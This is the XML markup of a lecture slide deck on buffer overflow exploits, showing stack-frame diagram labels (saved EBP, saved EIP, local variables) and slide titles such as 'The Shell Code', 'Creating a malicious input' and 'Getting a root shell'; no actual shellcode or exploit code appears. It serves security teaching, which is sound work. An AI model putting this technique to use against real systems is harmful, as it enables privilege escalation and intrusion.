            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42009" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3048000"/>
              <a:ext cx="2971800" cy="762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local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41990" name="Right Arrow 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3733800"/>
            <a:ext cx="3048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4267200" y="2514600"/>
            <a:ext cx="137160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push EBP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allocate a new frame for local variables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Stack buffer overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44034" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3459163"/>
            <a:ext cx="1447800" cy="1892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/>
              <a:t>function(s){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/>
              <a:t>  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/>
              <a:t>  return;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/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036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8580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BACCBF4-E8B2-9C44-9902-B512D60E0AB9}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44037" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="3265488" cy="4800600"/>
            <a:chOff x="5116512" y="609600"/>
            <a:chExt cx="4256088" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44039" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1752600"/>
              <a:ext cx="297180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0" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44041" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44042" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="13716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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44043" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="2590800"/>
              <a:ext cx="29718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top of stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44044" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="2362200"/>
              <a:ext cx="60171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&lt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44045" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="601713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/>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44046" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="454025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function argument</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44047" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3810000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saved EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44048" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4175125"/>
              <a:ext cx="2971800" cy="43968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saved EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44049" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4916488"/>
              <a:ext cx="2971800" cy="64611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main() local vars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44050" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="2819400"/>
              <a:ext cx="8382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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44051" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="3581400"/>
              <a:ext cx="838200" cy="439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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44052" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="30480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3" name="Line 37"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="38100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4" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5562600"/>
              <a:ext cx="29718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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44055" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5943600"/>
              <a:ext cx="2971800" cy="381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environment var</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
                <a:t>s</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44056" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="3048000"/>
              <a:ext cx="2971800" cy="76200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local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44038" name="Right Arrow 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="4572000"/>
            <a:ext cx="3048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5296</TotalTime>
  <Words>1778</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>480</Paragraphs>
  <Slides>21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Default Design</vt:lpstr>
      <vt:lpstr>Buffer Overflow Exploits</vt:lpstr>
      <vt:lpstr>Buffer overflow vulnerability</vt:lpstr>
      <vt:lpstr>32-bit x86 CPU registers</vt:lpstr>
      <vt:lpstr>Linux process memory map</vt:lpstr>
      <vt:lpstr>Calling a function</vt:lpstr>
      <vt:lpstr>Calling a function</vt:lpstr>
      <vt:lpstr>Calling a function</vt:lpstr>
      <vt:lpstr>Calling a function</vt:lpstr>
      <vt:lpstr>Stack buffer overflow attack</vt:lpstr>
      <vt:lpstr>Returning from a function</vt:lpstr>
      <vt:lpstr>Returning from a function</vt:lpstr>
      <vt:lpstr>Stack overflow attack</vt:lpstr>
      <vt:lpstr>Stack overflow attack</vt:lpstr>
      <vt:lpstr>Stack overflow attack</vt:lpstr>
      <vt:lpstr>Stack overflow attack</vt:lpstr>
      <vt:lpstr>Writing a buffer overflow exploit</vt:lpstr>
      <vt:lpstr>The “Shell Code”</vt:lpstr>
      <vt:lpstr>Creating a malicious input</vt:lpstr>
      <vt:lpstr>Some useful gdb commands</vt:lpstr>
      <vt:lpstr>Hints</vt:lpstr>
      <vt:lpstr>Getting a root shell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Xinming Ou</cp:lastModifiedBy>
  <cp:revision>322</cp:revision>
  <cp:lastPrinted>2009-04-22T19:24:48Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-08-25T19:33:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-24T00:52:43Z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